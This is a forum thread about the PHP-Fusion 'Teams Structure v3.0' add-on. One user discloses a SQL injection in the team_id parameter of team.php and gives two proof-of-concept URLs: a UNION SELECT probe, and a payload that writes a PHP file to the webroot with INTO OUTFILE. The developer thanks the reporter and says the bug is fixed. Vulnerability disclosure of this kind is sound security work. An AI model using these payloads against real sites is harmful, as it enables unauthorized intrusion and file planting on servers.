Teams Structure v3.0

looking good, keep up the great work :D

Looking good yes - but it have a possibility to insert an SQL
injection.

Details:
The "team_id" variable is not probably sanitized before using in SQL query
in "team.php", the attack can be elevated as shown in second POC to bypass
PHPFusion's GET variable XSS filter. by using back-ticks instead of
brackets used in any php function in that case shell_exec().

Condition:
magic_quotes_gpc = Off

POC:
*http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select
'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17

*http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select '1','2','<?php $out=id;echo $out;
?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into
outfile '/var/www/php-fusion/files/images/test.php

- remove the * from the link.

:|
@smokeman, there is a proposal to eliminate the errors?

I don't have much knowledge in hacking - so no, sry. :|

But I think you should write to admins and ask them to remove it from the download immediately!


Edit: http://www.google.dk/#hl=da&sourc...a434e89542
- pick one for yourself. ;)

Soo many results in just 4 days (the day this sql injection was disvovered)

thanks, I will fix the problem ...

When you're at it: There's missing an empty index.php file in the following two maps: "locale" and "ink". I wonder how it got passed by the Addon Approval ?

:)

@smokeman, I fixed the bug, I want to again say thank you for your timely information ...
in the coming days, plan to release v4.0, which will be all fixed and new functions

No Problem m8 - Im just glad to help where I can. I've not being much aroun the community for a time (about 3 months) - before I "started up" again.

Hehe, and now Im hooked - again.. :)